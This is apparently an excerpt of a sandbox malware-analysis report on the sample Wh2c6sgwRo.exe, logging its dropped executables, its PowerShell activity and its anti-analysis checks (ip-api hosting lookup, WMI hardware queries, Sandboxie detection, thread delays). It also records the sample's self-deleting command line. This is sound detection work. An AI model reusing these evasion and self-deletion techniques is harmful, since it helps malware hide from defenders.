                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Process created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL@
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Memory allocated: 190602A0000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Memory allocated: 19079D90000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Memory allocated: 14F0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Memory allocated: 1AF40000 memory reserve | memory write watch
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: 800000 memory reserve | memory write watch
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: 1A450000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: 1260000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: 1AE70000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exe Memory allocated: 9F0000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exe Memory allocated: 1A450000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exe Memory allocated: 15D0000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exe Memory allocated: 1AF80000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exe Memory allocated: 1030000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exe Memory allocated: 1AB80000 memory reserve | memory write watch
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: 8A0000 memory reserve | memory write watch
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: 1A3B0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: F50000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: 1AB40000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exe Memory allocated: 1460000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exe Memory allocated: 1AF90000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: B30000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: 1A460000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exe Memory allocated: 1460000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exe Memory allocated: 1AE70000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: AA0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Memory allocated: 1A4B0000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 600000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 599889
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 599780
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 599671
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 599562
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 599453
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 599341
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 599232
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 598884
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 598769
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 598640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 598505
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 598312
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 597218
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 3600000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 596343
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 594093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 593484
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 593093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 592859
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 590812
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 590562
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 300000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 590343
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 590130
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 588968
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 588363
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 588156
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 587937
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 587609
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 587452
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 587183
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 585670
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 585560
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 585405
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 585276
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 585130
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 584937
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 584828
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 584715
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 584593
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 584484
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 584310
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 583603
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 583462
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 583352
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 583234
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 583124
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 583015
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 582903
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 582767
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 582640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 582530
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 582421
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 582312
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 582202
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 582093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 581984
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 581874
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 581750
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 581634
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 580867
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 580750
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 580640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 580531
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Thread delayed: delay time: 580421
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
